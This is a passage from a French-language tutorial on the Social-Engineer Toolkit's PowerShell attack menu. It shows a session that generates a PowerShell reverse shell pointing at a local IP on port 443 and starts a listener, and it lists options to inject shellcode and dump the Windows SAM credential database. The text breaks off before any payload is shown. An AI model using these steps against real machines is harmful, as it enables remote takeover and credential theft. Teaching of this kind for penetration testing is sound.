Powershell Attack Vectors

Enfin, la rubrique Powershell Attack Vectors permet de créer un code malveillant en PowerShell afin que ce dernier soit exécuté sur un système de type Windows :

set> 9  
 
The Powershell Attack Vector module allows you to create PowerShell 
specific attacks. These attacks will allow you to use PowerShell which 
is available by default in all operating systems Windows Vista and 
above. PowerShell provides a fruitful landscape for deploying 
payloads and performing functions that  do not get triggered 
by preventative technologies.  
 
  1) Powershell Alphanumeric Shellcode Injector  
  2) Powershell Reverse Shell  
  3) Powershell Bind Shell  
  4) Powershell Dump SAM Database  
 
 99) Return to Main Menu 
 
set:powershell>2  
Enter the IPAddress or DNS name for the reverse host: 192.168.171.152 
set:powershell> Enter the port for listener [443]: 443  
[*] Rewriting the powershell reverse shell with options  
[*] Exporting the powershell stuff to /root/.set/reports/powershell 
 
set> Do you want to start a listener [yes/no]: yes 
 
Listening on 0.0.0.0:443 

Dans ce cas de figure, le reverse shell en PowerShell se trouve au sein du fichier /root/.set/reports/powershell/powershell.reverse.txt qu’il ne reste plus qu’à déposer et exécuter sur la machine victime :...